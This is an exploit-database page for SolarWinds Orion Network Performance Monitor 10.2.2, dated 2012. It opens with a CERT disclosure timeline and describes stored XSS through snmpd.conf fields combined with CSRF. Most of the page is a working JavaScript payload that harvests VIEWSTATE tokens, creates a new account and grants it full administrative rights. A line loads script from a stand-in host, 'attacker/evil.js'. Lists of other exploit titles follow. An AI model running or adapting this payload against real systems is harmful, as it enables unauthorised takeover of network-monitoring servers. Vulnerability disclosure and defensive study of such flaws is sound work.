Menu

Search for hundreds of thousands of exploits

"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities"

Author

Exploit author

muts

Platform

Exploit platform

windows

Release date

Exploit published date

2012-07-21

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
/*
######################################################################################
# Exploit Title: SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities
# Date: Jul 21 2012
# Author: muts
# Version: SolarWinds Orion Network Performance Monitor 10.2.2
# Vendor URL: http://www.solarwinds.com/
######################################################################################

Timeline:

29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
02 Jul 2012: Contact received from SolarWinds with vulnerability confirmation and plans for remediation
09 Jul 2012: SolarWinds provides a preview release (10.3.1) for testing
10 Jul 2012: Advised SolarWinds that the preview release fixed the reported vulnerabilities
21 Jul 2012: Public disclosure

Vulnerability Details:

SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be:

syslocation <script>alert('location')</script> 
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script>

In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection.

Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file:

syscontact <script src="http://attacker/evil.js"></script>


*/


function getCookie(c_name)
{
    var i,x,y,ARRcookies=document.cookie.split(";");
    for (i=0;i<ARRcookies.length;i++)
    {
        x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
        y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
        x=x.replace(/^\s+|\s+$/g,"");
        if (x==c_name)
        {
            return unescape(y);
        }
    }
}

function setCookie(c_name,value,exdays)
{
    var exdate=new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
    document.cookie=c_name + "=" + c_value;
}

function postCredentials(viewState, user, password)
{
    var http = new XMLHttpRequest();
    var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
   
    var params = "ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" +
                 "__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1" + "&" +
                 "__EVENTARGUMENT" + "=" + "&" +
                 "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName" + "=" + user + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password" + "=" + password + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword" + "=" + password + "&" +
                 "__ASYNCPOST" + "=" + "false"
                 
    http.open("POST", url, false);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-lenth", params.length);
    http.setRequestHeader("Connection", "close");
    http.send(params);
    var response = http.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = response;
    return(doc);
}

function setAdminPriv(viewState, username)
{
    var http = new XMLHttpRequest();
    var url = "/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit";
   
    var params = "__EVENTTARGET" + "=" + "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton" + "&" +
                 "__EVENTARGUMENT" + "=" + "&" +
                 "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible" + "=" + "hidden" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires" + "=" + "Never" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox" + "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound" + "=" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems" + "=" + "50" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars" + "=" + "Default" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars" + "=" + "Network_TabMenu" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars" + "=" + "Virtualization_TabMenu" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView" + "=" + "1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView" + "=" + "1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder" + "=" + "%5CReports" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails" + "=" + "-1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails" + "=" + "3" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails" + "=" + "7" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails" + "=" + "14" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails" + "=" + "22" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails" + "=" + "24" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "9" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "10" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker" + "=" + "11"

    http.open("POST", url, false);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-lenth", params.length);
    http.setRequestHeader("Connection", "close");
    http.send(params);
    var response = http.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = response;
    return(doc);
}

function getHtmlBody(url, ref)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open('GET', url, false);
    xmlHttp.send(null);
    var results = xmlHttp.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = results;
    return(doc);
}

function getViewState(doc)
{
    return(doc.getElementById("__VIEWSTATE"));
}

var username = "myuser";
var password = "test";

// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
    // Get the initial view-state
    var doc1 = getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
   
    // Create a new account with the given credentials
    postCredentials(getViewState(doc1).value, username, password);
   
    // Get the edit account view-state
    var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username + "&AccountType=Edit");
   
    // Assign our new account with administrative privileges
    setAdminPriv(getViewState(doc2).value, username);
   
    // Set the cookie to avoid duplicated attacks
    setCookie("o1", 1, "");
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2010-07-06 "Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service" dos windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-18 "DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)" local windows muts
2008-04-02 "Novel eDirectory HTTP - Denial of Service" dos windows muts
2008-04-02 "Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service" dos windows muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service" dos windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.